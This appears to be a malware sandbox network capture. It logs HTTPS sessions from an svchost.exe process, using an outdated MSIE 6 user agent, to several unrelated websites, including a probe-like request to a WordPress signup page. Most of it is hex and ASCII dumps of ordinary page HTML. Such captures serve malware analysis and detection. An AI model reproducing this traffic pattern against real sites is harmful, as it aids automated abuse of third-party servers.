                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC973INData Raw: 30 30 30 2f 73 76 67 27 20 76 69 65 77 42 6f 78 3d 27 30 20 30 20 33 32 20 33 32 27 20 77 69 64 74 68 3d 27 37 32 27 20 68 65 69 67 68 74 3d 27 37 32 27 20 66 69 6c 6c 3d 27 72 67 62 61 25 32 38 35 31 25 32 43 35 31 25 32 43 35 31 25 32 43 30 2e 32 35 25 32 39 27 25 33 45 20 20 20 25 33 43 70 61 74 68 20 74 72 61 6e 73 66 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 32 29 27 20 64 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 25 33 45 20 20 20 20 20 20 25 33 43 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 64 27 20 76 61 6c 75 65 73 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 34 20 56 32 38 20 48 34 20 56 34 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 31 32 20
                                                                                                                                                                                                                                                                        Data Ascii: 000/svg' viewBox='0 0 32 32' width='72' height='72' fill='rgba%2851%2C51%2C51%2C0.25%29'%3E %3Cpath transform='translate(2)' d='M0 12 V20 H4 V12z'%3E %3Canimate attributeName='d' values='M0 12 V20 H4 V12z; M0 4 V28 H4 V4z; M0 12 V20 H4 V12z; M0 12
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC981INData Raw: 61 6c 6c 6f 77 65 64 20 74 6f 20 75 70 6c 6f 61 64 20 69 73 20 30 2e 22 2c 22 6e 65 65 64 73 5f 62 73 34 22 3a 22 22 2c 22 6f 6e 65 5f 6f 70 74 69 6f 6e 22 3a 22 43 68 6f 6f 73 65 20 61 6e 20 6f 70 74 69 6f 6e 22 2c 22 6f 6e 65 5f 6f 72 5f 6d 6f 72 65 5f 6f 70 74 69 6f 6e 22 3a 22 43 68 6f 6f 73 65 20 6f 6e 65 20 6f 72 20 6d 6f 72 65 20 6f 70 74 69 6f 6e 73 22 2c 22 70 65 72 6d 61 6c 69 6e 6b 73 22 3a 22 31 22 2c 22 72 65 63 61 70 74 63 68 61 5f 73 69 74 65 5f 6b 65 79 22 3a 22 22 2c 22 72 65 63 61 70 74 63 68 61 5f 76 65 72 73 69 6f 6e 22 3a 22 76 32 22 2c 22 72 65 70 6c 69 65 73 5f 74 6f 5f 6c 6f 61 64 22 3a 22 35 22 2c 22 72 65 70 6c 79 5f 6c 61 62 65 6c 22 3a 22 52 65 70 6c 79 22 2c 22 73 65 61 72 63 68 5f 70 6c 61 63 65 68 6f 6c 64 65 72 22 3a 22 53
                                                                                                                                                                                                                                                                        Data Ascii: allowed to upload is 0.","needs_bs4":"","one_option":"Choose an option","one_or_more_option":"Choose one or more options","permalinks":"1","recaptcha_site_key":"","recaptcha_version":"v2","replies_to_load":"5","reply_label":"Reply","search_placeholder":"S
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC989INData Raw: 67 72 6f 75 6e 64 3a 23 66 66 66 66 65 30 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 65 36 64 62 35 35 7d 3c 2f 73 74 79 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 50 6f 77 65 72 65 64 20 62 79 20 53 6c 69 64 65 72 20 52 65 76 6f 6c 75 74 69 6f 6e 20 35 2e 34 2e 38 20 2d 20 72 65 73 70 6f 6e 73 69 76 65 2c 20 4d 6f 62 69 6c 65 2d 46 72 69 65 6e 64 6c 79 20 53 6c 69 64 65 72 20 50 6c 75 67 69 6e 20 66 6f 72 20 57 6f 72 64 50 72 65 73 73 20 77 69 74 68 20 63 6f 6d 66 6f 72 74 61 62 6c 65 20 64 72 61 67 20 61 6e 64 20 64 72 6f 70 20 69 6e 74 65 72 66 61 63 65 2e 22 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 64 6f 63 75
                                                                                                                                                                                                                                                                        Data Ascii: ground:#ffffe0;border:1px solid #e6db55}</style><meta name="generator" content="Powered by Slider Revolution 5.4.8 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface."/><script type="text/javascript">docu
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC998INData Raw: 2d 6d 6f 62 69 6c 65 2d 6d 65 6e 75 2d 69 63 6f 6e 27 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 27 64 74 2d 6d 6f 62 69 6c 65 2d 68 65 61 64 65 72 27 3e 0a 09 3c 75 6c 20 69 64 3d 22 6d 6f 62 69 6c 65 2d 6d 65 6e 75 22 20 63 6c 61 73 73 3d 22 6d 6f 62 69 6c 65 2d 6d 61 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6d 65 6e 75 22 3e 0a 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 68 6f 6d 65 20 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 69 74 65 6d 20 70 61 67 65 5f 69 74 65 6d 20 70 61 67 65 2d 69 74 65 6d 2d 31 36 20
                                                                                                                                                                                                                                                                        Data Ascii: -mobile-menu-icon'><span></span></div><div class='dt-mobile-header'><ul id="mobile-menu" class="mobile-main-nav" role="menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-16
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC1006INData Raw: 3b 76 61 72 20 6d 79 3d 6e 6f 77 2e 67 65 74 54 69 6d 65 28 29 3b 6e 6f 77 3d 6e 65 77 20 44 61 74 65 28 6d 79 2d 64 69 66 66 6d 73 29 3b 74 69 6d 65 72 49 44 3d 73 65 74 54 69 6d 65 6f 75 74 28 27 73 68 6f 77 74 69 6d 65 28 29 27 2c 31 30 30 30 30 29 3b 74 69 6d 65 72 52 75 6e 6e 69 6e 67 3d 74 72 75 65 3b 7d 0a 66 75 6e 63 74 69 6f 6e 20 73 74 61 72 74 63 6c 6f 63 6b 28 29 7b 73 74 6f 70 63 6c 6f 63 6b 28 29 3b 73 68 6f 77 74 69 6d 65 28 29 3b 7d 0a 76 61 72 20 74 69 6d 65 72 49 44 3d 6e 75 6c 6c 3b 76 61 72 20 74 69 6d 65 72 52 75 6e 6e 69 6e 67 3d 66 61 6c 73 65 3b 76 61 72 20 78 3d 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 6e 6f 77 3d 78 2e 67 65 74 54 69 6d 65 28 29 3b 76 61 72 20 67 6d 74 3d 31 36 37 38 34 33 31 33 37 38 2a 31 30 30 30 3b 76 61
                                                                                                                                                                                                                                                                        Data Ascii: ;var my=now.getTime();now=new Date(my-diffms);timerID=setTimeout('showtime()',10000);timerRunning=true;}function startclock(){stopclock();showtime();}var timerID=null;var timerRunning=false;var x=new Date();var now=x.getTime();var gmt=1678431378*1000;va


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        57192.168.2.655397104.21.48.207443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC761OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: orlyhotel.com
                                                                                                                                                                                                                                                                        Cookie: django_language=en
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC861INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:17 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Cache-Control: max-age=0, no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Expires: Fri, 10 Mar 2023 06:46:21 GMT
                                                                                                                                                                                                                                                                        Content-Language: en
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 10 Mar 2023 06:46:21 GMT
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Vary: Accept-Language
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EPV3FBmbUbxBUnuL5HWOaYoXOYmxO%2Fl%2FNQ1JTtZn9HP4XdmCQFkyMc7BWOASOS9irOoPsxK%2FfqvCMTemnUVTV19Cnx0iy9iQnvgqwUyRTrgyl11X%2FD5Ri2PZI0wz0SdB"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a82bde105c20-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC862INData Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 1b<h1>Server Error (500)</h1>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC862INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        58192.168.2.6553925.189.171.125443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC761OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: www.muhr-soehne.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC761INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:17 GMT
                                                                                                                                                                                                                                                                        Server: Apache/2.4.38 (Debian)
                                                                                                                                                                                                                                                                        Last-Modified: Thu, 02 Mar 2023 15:05:19 GMT
                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                        Content-Length: 51841
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC778INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC794INData Raw: 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65
                                                                                                                                                                                                                                                                        Data Ascii: Verschliemaschinen </a> </li> <li class="nav-item layout-0 "> <a href="/verschlie
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC810INData Raw: 66 72 61 6d 65 2d 6c 61 79 6f 75 74 2d 30 20 20 20 6d 74 2d 30 20 6d 62 2d 30 0a 20 20 20 20 0a 0a 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 6c 2d 33 20 63 6f 6c 2d 6c 67 2d 36 20 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 73 6d 2d 31 32 20 63 6f 6c 2d 31 32 20 6d 79 2d 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 72 76 69 63 65 62 6f 78 20 68 2d 31 30 30 20 62 67 2d 6c 69 67 68 74 2d 67 72 65 79 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 20 68 2d 31 30 30 20 77 2d 31 30 30 20 70 2d 33 20 22 3e 0a
                                                                                                                                                                                                                                                                        Data Ascii: frame-layout-0 mt-0 mb-0 "> <div class="row"> <div class="col-xl-3 col-lg-6 col-md-6 col-sm-12 col-12 my-4"> <div class="servicebox h-100 bg-light-grey d-flex flex-column h-100 w-100 p-3 ">
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC826INData Raw: 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 20 6d 79 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 78 2d 30 20 6d 78 2d 6d 64 2d 35 20 6d 79 2d 32 20 6d 79 2d 6d 64 2d 30 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 74 65 6d 4c 69 73 74 45 6c 65 6d 65 6e 74 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 69 73 74 49 74 65 6d 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72
                                                                                                                                                                                                                                                                        Data Ascii: justify-content-center my-3"> <li class="mx-0 mx-md-5 my-2 my-md-0" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem" aria-current="page"> <a hr


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        59192.168.2.65539983.223.113.46443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC810OUTGET /wp-signup.php?new=magicomm.co.uk HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: dataform.co.uk
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC1011INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Cache-Control: must-revalidate, no-cache, max-age=0
                                                                                                                                                                                                                                                                        Keep-Alive: timeout=2, max=95
                                                                                                                                                                                                                                                                        Content-Length: 48939
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/7.0.29
                                                                                                                                                                                                                                                                        X-UA-Compatible: IE=EmulateIE10
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        X-Mod-Pagespeed: 1.9.32.14-0
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=10886400
                                                                                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:17 GMT
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC1012INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html>...[if !(IE 6) | !(IE 7) | !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC1015INData Raw: 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 2c 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 28 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 6e 2c 21 31 29 2c 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 6e 2c 21 31 29 29 3a 28 65 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 6c 6f 61 64 22 2c 6e 29 2c 61 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 61 2e 72 65 61 64 79 53 74 61 74 65 26 26 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 29 29 2c 28 6e 3d 74 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63
                                                                                                                                                                                                                                                                        Data Ascii: eadyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).conc
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC1032INData Raw: 20 30 2e 34 20 30 2e 38 3b 30 2e 32 20 30 2e 38 20 30 2e 34 20 30 2e 38 27 20 63 61 6c 63 4d 6f 64 65 3d 27 73 70 6c 69 6e 65 27 20 20 2f 25 33 45 20 20 20 25 33 43 2f 70 61 74 68 25 33 45 20 20 20 25 33 43 70 61 74 68 20 74 72 61 6e 73 66 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 31 34 29 27 20 64 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 25 33 45 20 20 20 20 20 25 33 43 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 64 27 20 76 61 6c 75 65 73 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 34 20 56 32 38 20 48 34 20 56 34 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 20 64 75 72 3d 27 31 2e 32 73 27 20 72 65 70 65
                                                                                                                                                                                                                                                                        Data Ascii: 0.4 0.8;0.2 0.8 0.4 0.8' calcMode='spline' /%3E %3C/path%3E %3Cpath transform='translate(14)' d='M0 12 V20 H4 V12z'%3E %3Canimate attributeName='d' values='M0 12 V20 H4 V12z; M0 4 V28 H4 V4z; M0 12 V20 H4 V12z; M0 12 V20 H4 V12z' dur='1.2s' repe
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC1040INData Raw: 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76 73 6c 69 64 65 72 2f 70 75 62 6c 69 63 2f 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2e 74 68 65 6d 65 70 75 6e 63 68 2e 72 65 76 6f 6c 75 74 69 6f 6e 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 35 2e 34 2e 38 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 77 63 5f 61 64 64 5f 74 6f 5f 63 61 72 74 5f 70 61 72 61 6d 73 3d 7b 22 61 6a 61 78 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61
                                                                                                                                                                                                                                                                        Data Ascii: ipt' src='https://dataform.co.uk/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8'></script><script type='text/javascript'>//<![CDATA[var wc_add_to_cart_params={"ajax_url":"https:\/\/dataform.co.uk\/wp-admin\/a
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC1048INData Raw: 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 32 30 78 31 32 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b
                                                                                                                                                                                                                                                                        Data Ascii: ps://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="76x76" href="https://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="120x120" href="https://dataform.co.uk
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC1056INData Raw: 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 34 30 34 30 22 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 70 72 69 63 69 6e 67 2f 27 20 64 61 74 61 2d 6c 65 76 65 6c 3d 27 31 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 74 65 78 74 22 3e 50 72 69 63 69 6e 67 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74
                                                                                                                                                                                                                                                                        Data Ascii: menu-item-object-page menu-item-54040"><a href='https://dataform.co.uk/pricing/' data-level='1'><span class="menu-item-text"><span class="menu-text">Pricing</span></span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-it
